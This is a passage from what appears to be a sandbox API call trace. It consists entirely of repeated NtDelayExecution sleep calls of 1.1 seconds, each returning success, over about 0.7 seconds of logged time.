(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.122] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.123] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.125] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.127] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.128] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.129] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.131] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.132] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.135] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.137] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.138] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.140] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.143] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.144] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.146] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.147] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.149] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.150] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.152] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.153] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.156] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.164] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.165] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.167] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.168] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.171] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.173] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.185] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.187] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.195] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.198] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.206] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.207] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.209] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.210] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.212] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.222] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.224] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.225] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.228] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.230] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.231] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.233] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.237] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.238] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.249] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.251] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.254] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.256] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.257] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.272] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.273] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.275] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.276] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.278] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.280] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.281] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.283] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.285] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.289] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.292] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.296] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.297] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.313] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.317] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.319] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.330] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.338] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.340] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.345] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.357] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.360] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.373] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.374] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.376] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.379] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.380] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.387] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.390] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.392] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.393] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.396] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.399] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.405] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.407] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.419] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.422] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.424] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.427] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.430] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.432] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.438] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.439] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.442] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.445] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.451] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.457] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.458] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.461] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.464] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.467] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.471] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.474] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.475] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.483] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.484] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.486] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.487] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.489] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.492] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.493] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.495] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.499] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.504] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.508] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.530] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.533] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.540] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.546] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.551] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.552] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.554] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.558] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.563] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.567] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.570] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.571] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.572] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.574] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.577] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.578] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.580] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.585] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.587] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.588] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.590] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.591] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.593] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.597] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.599] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.600] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.602] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.603] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.605] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.609] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.611] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.612] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.614] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.620] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.622] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.623] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.625] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.628] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.629] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.643] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.646] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.649] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.652] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.655] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.665] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.667] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.668] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.670] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.671] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.673] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.676] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.677] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.808] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.810] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.811] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.814] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.816] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.825] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.828] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.833] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.838] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.839] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.842] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.844] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.848] NtDelayExecution 